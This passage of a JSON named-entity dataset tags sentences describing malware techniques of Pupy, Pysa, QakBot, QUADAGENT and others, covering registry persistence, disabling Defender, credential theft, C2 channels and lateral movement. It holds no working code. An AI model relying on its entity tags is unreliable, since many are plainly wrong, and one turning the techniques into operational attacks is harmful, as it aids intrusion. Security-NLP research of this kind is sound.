"O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "list", - "local", - "and", - "remote", - "shared", - "drives", - "and", - "folders", - "over", - "SMB." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "also", - "perform", - "pass-the-ticket." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "has", - "a", - "module", - "for", - "loading", - "and", - "executing", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "list", - "the", - "running", - "processes", - "and", - "get", - "the", - "process", - "ID", - "and", - "parent", - "process’s", - "ID." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "use", - "an", - "add", - "on", - "feature", - "when", - "creating", - "payloads", - "that", - "allows", - "you", - "to", - "create", - "custom", - "Python", - "scripts", - "(“scriptlets”)", - "to", - "perform", - "tasks", - "offline", - "(without", - "requiring", - "a", - "session)", - "such", - "as", - "sandbox", - "detection,", - "adding", - "persistence,", - "etc." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "adds", - "itself", - "to", - "the", - "startup", - "folder", - "or", - "adds", - "itself", - "to", - "the", - "Registry", - "key", - "<code>SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run</code>", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "enable/disable", - "RDP", - "connection", - "and", - "can", - "start", - "a", - "remote", - "desktop", - "session", - "using", - "a", - "browser", - "web", - "socket", - "client." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "drop", - "a", - "mouse-logger", - "that", - "will", - "take", - "small", - "screenshots", - "around", - "at", - "each", - "click", - "and", - "then", - "send", - "back", - "to", - "the", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "uses", - "PsExec", - "to", - "execute", - "a", - "payload", - "or", - "commands", - "on", - "a", - "remote", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "has", - "a", - "module", - "that", - "checks", - "a", - "number", - "of", - "indicators", - "on", - "the", - "system", - "to", - "determine", - "if", - "its", - "running", - "on", - "a", - "virtual", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "grab", - "a", - "system’s", - "information", - "including", - "the", - "OS", - "version,", - "architecture,", - "etc." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "has", - "built", - "in", - "commands", - "to", - "identify", - "a", - "host’s", - "IP", - "address", - "and", - "find", - "out", - "other", - "network", - "configuration", - "settings", - "by", - "viewing", - "connected", - "sessions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "has", - "a", - "built-in", - "utility", - "command", - "for", - "<code>netstat</code>,", - "can", - "do", - "net", - "session", - "through", - "PowerView,", - "and", - "has", - "an", - "interactive", - "shell", - "which", - "can", - "be", - "used", - "to", - "discover", - "additional", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "enumerate", - "local", - "information", - "for", - "Linux", - "hosts", - "and", - "find", - "currently", - "logged", - "on", - "users", - "for", - "Windows", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "be", - "used", - "to", - "establish", - "persistence", - "using", - "a", - "systemd", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "obtain", - "a", - "list", - "of", - "SIDs", - "and", - "provide", - "the", - "option", - "for", - "selecting", - "process", - "tokens", - "to", - "impersonate." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "access", - "a", - "connected", - "webcam", - "and", - "capture", - "pictures." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "communicate", - "over", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "use", - "an", - "XDG", - "Autostart", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PyDCrypt", - "has", - "decrypted", - "and", - "dropped", - "the", - "DCSrv", - "payload", - "to", - "disk." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PyDCrypt", - "has", - "modified", - "firewall", - "rules", - "to", - "allow", - "incoming", - "SMB,", - "NetBIOS,", - "and", - "RPC", - "connections", - "using", - "`netsh.exe`", - "on", - "remote", - "machines." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PyDCrypt", - "has", - "been", - "compiled", - "and", - "encrypted", - "with", - "PyInstaller,", - "specifically", - "using", - "the", - "--key", - "flag", - "during", - "the", - "build", - "phase." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PyDCrypt", - "will", - "remove", - "all", - "created", - "artifacts", - "such", - "as", - "dropped", - "executables." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PyDCrypt", - "has", - "dropped", - "DCSrv", - "under", - "the", - "`svchost.exe`", - "name", - "to", - "disk." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PyDCrypt", - "has", - "attempted", - "to", - "execute", - "with", - "PowerShell." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PyDCrypt,", - "along", - "with", - "its", - "functions,", - "is", - "written", - "in", - "Python." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PyDCrypt", - "has", - "used", - "netsh", - "to", - "find", - "RPC", - "connections", - "on", - "remote", - "machines." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "O", - "I-Features", - "B-Purp", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PyDCrypt", - "has", - "probed", - "victim", - "machines", - "with", - "<code>whoami</code>", - "and", - "has", - "collected", - "the", - "username", - "from", - "the", - "machine." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PyDCrypt", - "has", - "used", - "`cmd.exe`", - "for", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "PyDCrypt", - "has", - "attempted", - "to", - "execute", - "with", - "WMIC." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "used", - "brute", - "force", - "attempts", - "against", - "a", - "central", - "management", - "console,", - "as", - "well", - "as", - "some", - "Active", - "Directory", - "accounts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "extracted", - "credentials", - "from", - "the", - "password", - "database", - "before", - "encrypting", - "the", - "files." - ], - "ner_tags": [ - "B-Time", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "used", - "RSA", - "and", - "AES-CBC", - "encryption", - "algorithm", - "to", - "encrypt", - "a", - "list", - "of", - "targeted", - "file", - "extensions." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "the", - "capability", - "to", - "stop", - "antivirus", - "services", - "and", - "disable", - "Windows", - "Defender." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "deleted", - "batch", - "files", - "after", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "the", - "functionality", - "to", - "delete", - "shadow", - "copies." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Pysa", - "can", - "perform", - "OS", - "credential", - "dumping", - "using", - "Mimikatz." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "executed", - "a", - "malicious", - "executable", - "by", - "naming", - "it", - "svchost.exe." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "modified", - "the", - "registry", - "key", - "“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System”", - "and", - "added", - "the", - "ransom", - "note." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pysa", - "can", - "perform", - "network", - "reconnaissance", - "using", - "the", - "Advanced", - "Port", - "Scanner", - "tool." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "used", - "Powershell", - "scripts", - "to", - "deploy", - "its", - "ransomware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "used", - "Python", - "scripts", - "to", - "deploy", - "ransomware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "laterally", - "moved", - "using", - "RDP", - "connections." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Pysa", - "has", - "used", - "PsExec", - "to", - "copy", - "and", - "execute", - "the", - "ransomware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pysa", - "can", - "stop", - "services", - "and", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Pysa", - "can", - "perform", - "network", - "reconnaissance", - "using", - "the", - "Advanced", - "IP", - "Scanner", - "tool." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "was", - "likely", - "obfuscated", - "using", - "`Invoke-Obfuscation`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "QUADAGENT", - "uses", - "DNS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "uses", - "AES", - "and", - "a", - "preshared", - "key", - "to", - "decrypt", - "the", - "custom", - "Base64", - "routine", - "used", - "to", - "encode", - "strings", - "and", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "uses", - "multiple", - "protocols", - "(HTTPS,", - "HTTP,", - "DNS)", - "for", - "its", - "C2", - "server", - "as", - "fallback", - "channels", - "if", - "communication", - "with", - "one", - "is", - "unsuccessful." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "has", - "a", - "command", - "to", - "delete", - "its", - "Registry", - "key", - "and", - "scheduled", - "task." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "stores", - "a", - "session", - "identifier", - "unique", - "to", - "the", - "compromised", - "system", - "as", - "well", - "as", - "a", - "pre-shared", - "key", - "used", - "for", - "encrypting", - "and", - "decrypting", - "C2", - "communications", - "within", - "a", - "Registry", - "key", - "(such", - "as", - "`HKCU\\Office365DCOMCheck`)", - "in", - "the", - "`HKCU`", - "hive." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "used", - "the", - "PowerShell", - "filenames", - "<code>Office365DCOMCheck.ps1</code>", - "and", - "<code>SystemDiskClean.ps1</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "modifies", - "an", - "HKCU", - "Registry", - "key", - "to", - "store", - "a", - "session", - "identifier", - "unique", - "to", - "the", - "compromised", - "system", - "as", - "well", - "as", - "a", - "pre-shared", - "key", - "used", - "for", - "encrypting", - "and", - "decrypting", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "uses", - "PowerShell", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "checks", - "if", - "a", - "value", - "exists", - "within", - "a", - "Registry", - "key", - "in", - "the", - "HKCU", - "hive", - "whose", - "name", - "is", - "the", - "same", - "as", - "the", - "scheduled", - "task", - "it", - "has", - "created." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "creates", - "a", - "scheduled", - "task", - "to", - "maintain", - "persistence", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "encodes", - "C2", - "communications", - "with", - "base64." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "gathers", - "the", - "current", - "domain", - "the", - "victim", - "system", - "belongs", - "to." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "gathers", - "the", - "victim", - "username." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "uses", - "VBScripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "QUADAGENT", - "uses", - "HTTPS", - "and", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUADAGENT", - "uses", - "cmd.exe", - "to", - "execute", - "scripts", - "and", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETCANARY", - "has", - "the", - "ability", - "to", - "stage", - "data", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETCANARY", - "can", - "use", - "a", - "custom", - "parsing", - "routine", - "to", - "decode", - "the", - "command", - "codes", - "and", - "additional", - "parameters", - "from", - "the", - "C2", - "before", - "executing", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETCANARY", - "can", - "execute", - "processes", - "in", - "a", - "hidden", - "window." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETCANARY", - "can", - "call", - "`System.Net.HttpWebRequest`", - "to", - "identify", - "the", - "default", - "proxy", - "configured", - "on", - "the", - "victim", - "computer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETCANARY", - "has", - "the", - "ability", - "to", - "retrieve", - "information", - "from", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETCANARY", - "can", - "base64", - "encode", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "QUIETCANARY", - "can", - "RC4", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETCANARY", - "can", - "identify", - "the", - "default", - "proxy", - "setting", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETCANARY", - "can", - "use", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETEXIT", - "can", - "use", - "an", - "inverse", - "negotiated", - "SSH", - "connection", - "as", - "part", - "of", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETEXIT", - "can", - "proxy", - "traffic", - "via", - "SOCKS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "QUIETEXIT", - "can", - "attempt", - "to", - "connect", - "to", - "a", - "second", - "hard-coded", - "C2", - "if", - "the", - "first", - "hard-coded", - "C2", - "address", - "fails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETEXIT", - "has", - "attempted", - "to", - "change", - "its", - "name", - "to", - "`cron`", - "upon", - "startup.", - "During", - "incident", - "response,", - "QUIETEXIT", - "samples", - "have", - "been", - "identified", - "that", - "were", - "renamed", - "to", - "blend", - "in", - "with", - "other", - "legitimate", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QUIETEXIT", - "can", - "establish", - "a", - "TCP", - "connection", - "as", - "part", - "of", - "its", - "initial", - "connection", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "the", - "ability", - "to", - "enumerate", - "windows", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "large", - "file", - "sizes", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "advanced", - "web", - "injects", - "to", - "steal", - "web", - "banking", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "conduct", - "brute", - "force", - "attacks", - "to", - "capture", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "signed", - "loaders", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "obfuscated", - "and", - "encoded", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "collected", - "usernames", - "and", - "passwords", - "from", - "Firefox", - "and", - "Chrome." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "the", - "ability", - "to", - "use", - "DLL", - "side-loading", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "a", - "variety", - "of", - "commands,", - "including", - "esentutl.exe", - "to", - "steal", - "sensitive", - "data", - "from", - "Internet", - "Explorer", - "and", - "Microsoft", - "Edge,", - "to", - "acquire", - "information", - "that", - "is", - "subsequently", - "exfiltrated." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "deobfuscate", - "and", - "re-assemble", - "code", - "strings", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "the", - "ability", - "to", - "modify", - "the", - "Registry", - "to", - "add", - "its", - "binaries", - "to", - "the", - "Windows", - "Defender", - "exclusion", - "list." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "domain", - "generation", - "algorithms", - "in", - "C2", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "run", - "<code>nltest", - "/domain_trusts", - "/all_trusts</code>", - "for", - "domain", - "trust", - "discovery." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "send", - "stolen", - "information", - "to", - "C2", - "nodes", - "including", - "passwords,", - "accounts,", - "and", - "emails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "move", - "laterally", - "using", - "worm-like", - "functionality", - "through", - "exploitation", - "of", - "SMB." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "a", - "module", - "that", - "can", - "proxy", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "delete", - "folders", - "and", - "files", - "including", - "overwriting", - "its", - "executable", - "with", - "legitimate", - "programs." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-HackOrg", - "I-Features", - "I-Features", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "identify", - "whether", - "it", - "has", - "been", - "run", - "previously", - "on", - "a", - "host", - "by", - "checking", - "for", - "a", - "specified", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "store", - "its", - "configuration", - "information", - "in", - "a", - "randomly", - "named", - "subkey", - "under", - "<code>HKCU\\Software\\Microsoft</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "been", - "delivered", - "in", - "ZIP", - "files", - 